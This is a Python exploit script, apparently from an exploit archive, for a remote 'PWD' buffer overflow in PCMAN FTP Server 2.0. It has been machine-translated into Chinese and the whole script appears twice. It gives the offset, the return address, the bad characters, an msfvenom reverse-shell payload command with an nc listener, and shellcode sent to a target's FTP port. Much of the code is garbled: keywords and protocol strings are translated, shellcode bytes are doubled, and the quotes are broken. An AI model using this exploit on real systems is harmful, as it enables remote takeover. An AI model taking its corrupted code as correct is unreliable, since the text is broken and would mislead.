#利用标题: PCMAN FTP服务器2.0-'PWD'远程缓冲区溢出
#日期: 09/25/2023
#利用作者: Waqas Ahmed Faroouqi(Zeroxinn)
#供应商homepage: http://pcman.openfoundry.org/
#软件link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-pcman.7z
#版本: 2.0
#在: Windows XP SP3上测试
#!/usr/bin/python
导入套接字
#buffer='a' * 2500
#offset=2007
#Badchars=\ x00 \ x0a \ x0d
#return_address=0x7e429353(user32.dll)
#MMSFVENOM -P Windows/shell_reverse_tcp lhost=192.168.146.130 lport=4444 exitfunc=thread -f c -b c -b'\ x00 \ x0a \ x0a \ x0d'
#NC -NVLP 4444
溢出=((
'\ xdb \ xce \ xd9 \ x74 \ x24 \ xf4 \ xf4 \ xba \ xc1 \ x93 \ x93 \ x3a \ xcc \ xcc \ x58 \ x31 \ x31 \ xc9''
'\ xb1 \ x52 \ x31 \ x50 \ x17 \ x17 \ x03 \ x50 \ x17 \ x83 \ x83 \ x01 \ x97 \ x97 \ xd8 \ x39 \ x39 \ x7d'\ x7d'
'\ x70 \ x9e \ xc2 \ x7d \ x81 \ xff \ x4b \ x98 \ xb0 \ xb0 \ x3f \ x2f \ x2f \ xe9 \ xe9 \ xe3 \ xe3 \ x8f'
'\ x3b \ xbf \ x0f \ x7b \ x69 \ x2b \ x9b \ x9b \ x09 \ xa6 \ x5c \ x5c \ x2c \ x2c \ xa7 \ x90 \ x90 \ x53'
'\ xad \ x94 \ xe1 \ xf2 \ x2d \ xe7 \ x35 \ xd4 \ xd4 \ x0c \ x28 \ x48 \ x48 \ x15 \ x15 \ x48 \ x55'\ x55'
'\ xa1 \ x47 \ x01 \ x11 \ x14 \ x77 \ x26 \ x6f \ x6f \ xa5 \ xfc \ xfc \ x74 \ x61 \ x61 \ xad \ xe1''
'\ xcd \ x80 \ x9c \ xb4 \ x46 \ xdb \ x3e \ x37 \ x37 \ x8a \ x57 \ x57 \ x77 \ x77 \ x2f \ xcf \ xcf \ x52'
'\ xc1 \ xc4 \ x3b \ x28 \ xd0 \ x0c \ x72 \ xd1 \ xd1 \ x7f \ x71 \ x71 \ xba \ xba \ x20 \ x20 \ x81 \ xb6'
'\ x7d \ xdb \ xf4 \ xce \ x7d \ x66 \ x0f \ x15 \ xff \ xff \ xbc \ x9a \ x9a \ x8d \ x8d \ xa7 \ x37'\ x37''
'\ x3c \ x69 \ x59 \ x9b \ xdb \ xfa \ x55 \ x55 \ x50 \ xaf \ xa4 \ x79 \ x67 \ x67 \ x7c \ x7c \ xdf'
'\ x86 \ xec \ x83 \ x0f \ x0f \ xb6 \ xa7 \ x8b \ x8b \ x4b \ x4b \ x6c \ xc9 \ x8a \ x8a \ x31 \ x31 \ xc3'
'\ xf6 \ xcc \ x99 \ xbc \ x52 \ x87 \ x34 \ x34 \ xa8 \ xee \ xca \ xca \ x50 \ x10 \ x1d \ xc3 \ xf4''
'\ xa0 \ x09 \ x54 \ x87 \ x92 \ x96 \ xce \ x0f \ x0f \ x9f \ x9f \ x5f \ x5f \ xc9 \ xc8 \ xc8 \ xe0 \ x75 \ x75'\ x75'
'\ xad \ x46 \ x1f \ x76 \ xce \ x4f \ xe4 \ x22 \ x9e \ x9e \ xe7 \ xcd \ xcd \ x4a \ x75 \ x75 \ xf7'''
'\ xf2 \ x9e \ xda \ xa7 \ x5c \ x71 \ x9b \ x9b \ x17 \ x1d \ x1d \ x21 \ x73 \ x73 \ x7d \ x92 \ x92 \ x1e''
'\ x63 \ x7e \ x78 \ x37 \ x0e \ x85 \ xeb \ xf8 \ xf8 \ x67 \ x17 \ x17 \ x6d \ x6d \ x90 \ x75 \ x75 \ x17'''
'\ x63 \ x3d \ xf3 \ xf1 \ xe9 \ xad \ x55 \ xaa \ x85 \ x85 \ x54 \ x54 \ xfc \ x20 \ x20 \ x37 \ x98'''
'\ x2a \ x4d \ x77 \ x12 \ xd9 \ xb2 \ x36 \ xd3 \ xd3 \ x94 \ xa0 \ xaf \ xaf \ x13 \ x13 \ xe3 \ x9a'''
'\ x66 \ x2b \ xd9 \ xb2 \ xe5 \ xbe \ x86 \ x42 \ x42 \ x63 \ xa3 \ xa3 \ x10 \ x10 \ x15 \ x15 \ x24 \ x15'\ x15'
'\ x69 \ xf3 \ xd8 \ x0c \ xc3 \ xe1 \ x20 \ xc8 \ xc8 \ x2c \ xa1 \ xfe \ xfe \ x29 \ xb2 \ xb2 \ x28''
'\ x72 \ x15 \ x90 \ x3a \ x4a \ x4a \ x96 \ x9c \ x6e \ x6e \ x02 \ xc1 \ xc1 \ x4a \ xd8 \ xd8 \ xe4 \ xbb'\ xbb'
'\ x3c \ xb2 \ xbe \ x10 \ x97 \ x52 \ x46 \ x5b \ x5b \ x28 \ x24 \ x24 \ x47 \ xb6 \ xb6 \ xde \ xc8''
'\ xf6 \ x6f \ xa7 \ xf7 \ x37 \ xf8 \ xf8 \ x2f \ x80 \ x25 \ x98 \ x98 \ xd0 \ xd0 \ x5b \ xee \ xb8'\ xb8''
'\ x32 \ x49 \ x1b \ x51 \ xeb \ x18 \ xa6 \ x3c \ x3c \ x0c \ xf7 \ xe5 \ xe5 \ x38 \ x38 \ x8f \ xfd \ xfd'
'\ x95 \ xbe \ x8f \ x74 \ x93 \ xfb \ x17 \ x65 \ x65 \ xe9 \ x94 \ x94 \ xfd \ x89 \ x5e \ x5e \ x94'''
'\ xd7')
shellCode='a' * 2007 +'\ x53 \ x93 \ x42 \ x7e' +' +'\ x90' * 32 +溢出
#根据需要更改IP/端口
s=socket.socket(socket.af_inet,socket.sock_stream)
TRY:
打印'\ nsending Evil Buffer .'
S.Connect(('192.168.146.135',21))
数据=s.recv(1024)
S.Send('用户匿名' +'\ r \ n')
数据=s.recv(1024)
S.Send('通过匿名\ r \ n')
S.Send('PWD' + shellCode +'\ r \ n')
s.close()
打印'\ nexploit成功完成!
Except:
打印“无法连接到FTP!”
#日期: 09/25/2023
#利用作者: Waqas Ahmed Faroouqi(Zeroxinn)
#供应商homepage: http://pcman.openfoundry.org/
#软件link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-pcman.7z
#版本: 2.0
#在: Windows XP SP3上测试
#!/usr/bin/python
导入套接字
#buffer='a' * 2500
#offset=2007
#Badchars=\ x00 \ x0a \ x0d
#return_address=0x7e429353(user32.dll)
#MMSFVENOM -P Windows/shell_reverse_tcp lhost=192.168.146.130 lport=4444 exitfunc=thread -f c -b c -b'\ x00 \ x0a \ x0a \ x0d'
#NC -NVLP 4444
溢出=((
'\ xdb \ xce \ xd9 \ x74 \ x24 \ xf4 \ xf4 \ xba \ xc1 \ x93 \ x93 \ x3a \ xcc \ xcc \ x58 \ x31 \ x31 \ xc9''
'\ xb1 \ x52 \ x31 \ x50 \ x17 \ x17 \ x03 \ x50 \ x17 \ x83 \ x83 \ x01 \ x97 \ x97 \ xd8 \ x39 \ x39 \ x7d'\ x7d'
'\ x70 \ x9e \ xc2 \ x7d \ x81 \ xff \ x4b \ x98 \ xb0 \ xb0 \ x3f \ x2f \ x2f \ xe9 \ xe9 \ xe3 \ xe3 \ x8f'
'\ x3b \ xbf \ x0f \ x7b \ x69 \ x2b \ x9b \ x9b \ x09 \ xa6 \ x5c \ x5c \ x2c \ x2c \ xa7 \ x90 \ x90 \ x53'
'\ xad \ x94 \ xe1 \ xf2 \ x2d \ xe7 \ x35 \ xd4 \ xd4 \ x0c \ x28 \ x48 \ x48 \ x15 \ x15 \ x48 \ x55'\ x55'
'\ xa1 \ x47 \ x01 \ x11 \ x14 \ x77 \ x26 \ x6f \ x6f \ xa5 \ xfc \ xfc \ x74 \ x61 \ x61 \ xad \ xe1''
'\ xcd \ x80 \ x9c \ xb4 \ x46 \ xdb \ x3e \ x37 \ x37 \ x8a \ x57 \ x57 \ x77 \ x77 \ x2f \ xcf \ xcf \ x52'
'\ xc1 \ xc4 \ x3b \ x28 \ xd0 \ x0c \ x72 \ xd1 \ xd1 \ x7f \ x71 \ x71 \ xba \ xba \ x20 \ x20 \ x81 \ xb6'
'\ x7d \ xdb \ xf4 \ xce \ x7d \ x66 \ x0f \ x15 \ xff \ xff \ xbc \ x9a \ x9a \ x8d \ x8d \ xa7 \ x37'\ x37''
'\ x3c \ x69 \ x59 \ x9b \ xdb \ xfa \ x55 \ x55 \ x50 \ xaf \ xa4 \ x79 \ x67 \ x67 \ x7c \ x7c \ xdf'
'\ x86 \ xec \ x83 \ x0f \ x0f \ xb6 \ xa7 \ x8b \ x8b \ x4b \ x4b \ x6c \ xc9 \ x8a \ x8a \ x31 \ x31 \ xc3'
'\ xf6 \ xcc \ x99 \ xbc \ x52 \ x87 \ x34 \ x34 \ xa8 \ xee \ xca \ xca \ x50 \ x10 \ x1d \ xc3 \ xf4''
'\ xa0 \ x09 \ x54 \ x87 \ x92 \ x96 \ xce \ x0f \ x0f \ x9f \ x9f \ x5f \ x5f \ xc9 \ xc8 \ xc8 \ xe0 \ x75 \ x75'\ x75'
'\ xad \ x46 \ x1f \ x76 \ xce \ x4f \ xe4 \ x22 \ x9e \ x9e \ xe7 \ xcd \ xcd \ x4a \ x75 \ x75 \ xf7'''
'\ xf2 \ x9e \ xda \ xa7 \ x5c \ x71 \ x9b \ x9b \ x17 \ x1d \ x1d \ x21 \ x73 \ x73 \ x7d \ x92 \ x92 \ x1e''
'\ x63 \ x7e \ x78 \ x37 \ x0e \ x85 \ xeb \ xf8 \ xf8 \ x67 \ x17 \ x17 \ x6d \ x6d \ x90 \ x75 \ x75 \ x17'''
'\ x63 \ x3d \ xf3 \ xf1 \ xe9 \ xad \ x55 \ xaa \ x85 \ x85 \ x54 \ x54 \ xfc \ x20 \ x20 \ x37 \ x98'''
'\ x2a \ x4d \ x77 \ x12 \ xd9 \ xb2 \ x36 \ xd3 \ xd3 \ x94 \ xa0 \ xaf \ xaf \ x13 \ x13 \ xe3 \ x9a'''
'\ x66 \ x2b \ xd9 \ xb2 \ xe5 \ xbe \ x86 \ x42 \ x42 \ x63 \ xa3 \ xa3 \ x10 \ x10 \ x15 \ x15 \ x24 \ x15'\ x15'
'\ x69 \ xf3 \ xd8 \ x0c \ xc3 \ xe1 \ x20 \ xc8 \ xc8 \ x2c \ xa1 \ xfe \ xfe \ x29 \ xb2 \ xb2 \ x28''
'\ x72 \ x15 \ x90 \ x3a \ x4a \ x4a \ x96 \ x9c \ x6e \ x6e \ x02 \ xc1 \ xc1 \ x4a \ xd8 \ xd8 \ xe4 \ xbb'\ xbb'
'\ x3c \ xb2 \ xbe \ x10 \ x97 \ x52 \ x46 \ x5b \ x5b \ x28 \ x24 \ x24 \ x47 \ xb6 \ xb6 \ xde \ xc8''
'\ xf6 \ x6f \ xa7 \ xf7 \ x37 \ xf8 \ xf8 \ x2f \ x80 \ x25 \ x98 \ x98 \ xd0 \ xd0 \ x5b \ xee \ xb8'\ xb8''
'\ x32 \ x49 \ x1b \ x51 \ xeb \ x18 \ xa6 \ x3c \ x3c \ x0c \ xf7 \ xe5 \ xe5 \ x38 \ x38 \ x8f \ xfd \ xfd'
'\ x95 \ xbe \ x8f \ x74 \ x93 \ xfb \ x17 \ x65 \ x65 \ xe9 \ x94 \ x94 \ xfd \ x89 \ x5e \ x5e \ x94'''
'\ xd7')
shellCode='a' * 2007 +'\ x53 \ x93 \ x42 \ x7e' +' +'\ x90' * 32 +溢出
#根据需要更改IP/端口
s=socket.socket(socket.af_inet,socket.sock_stream)
TRY:
打印'\ nsending Evil Buffer .'
S.Connect(('192.168.146.135',21))
数据=s.recv(1024)
S.Send('用户匿名' +'\ r \ n')
数据=s.recv(1024)
S.Send('通过匿名\ r \ n')
S.Send('PWD' + shellCode +'\ r \ n')
s.close()
打印'\ nexploit成功完成!
Except:
打印“无法连接到FTP!”